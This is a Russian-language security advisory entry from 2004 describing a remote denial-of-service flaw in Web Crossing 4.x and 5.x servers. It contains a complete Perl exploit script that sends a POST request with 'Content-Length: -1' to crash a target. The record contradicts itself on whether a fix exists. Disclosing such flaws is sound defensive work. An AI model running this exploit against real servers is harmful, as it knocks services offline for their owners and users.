Дата публикации: | 09.02.2004 |
Всего просмотров: | 1300 |
Опасность: | Средняя |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Отказ в обслуживании |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: |
Web Crossing 4.x
Web Crossing 5.x |
Уязвимые версии: Web Crossing 4.х, 5.х
Описание: Отказ в обслуживании обнаружен в Web Crossing. Удаленный пользователь может аварийно завершить работу сервера. Удаленный пользователь может представить HTTP POST запрос с отрицательным или чрезмерно большим заголовком 'Content-Length', чтобы аварийно завершить работу сервера. Пример/Эксплоит: #!/usr/bin/perl -w # Web Crossing 4.x\5.x Denial of Service Exploit # [ Bad 'Content-Length' Header Bug ] # - by Peter Winter-Smith [peter4020@hotmail.com] use IO::Socket; if(!($ARGV[0])) print "Usage: wxdos.pl <victim>\n"; exit; print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" . "\t[ Bad 'Content-Length' Header Bug ]\n" . "\t[peter4020\@hotmail.com]\n\n"; $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0], PeerPort=>"80") or die "Unable to connect to $ARGV[0] on " . "port 80"; $DoS = "POST / HTTP/1.1\r\n" . "Content-Length: -1\r\n\r\n"; print $victim $DoS; print "[+] Evil request made to target server ... Waiting...!\n"; sleep(4); close($victim); print "[+] Done!\n"; exit; URL производителя:http://webcrossing.com/Home/products/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Web Crossing 4.x/5.x Denial of Service Vulnerability |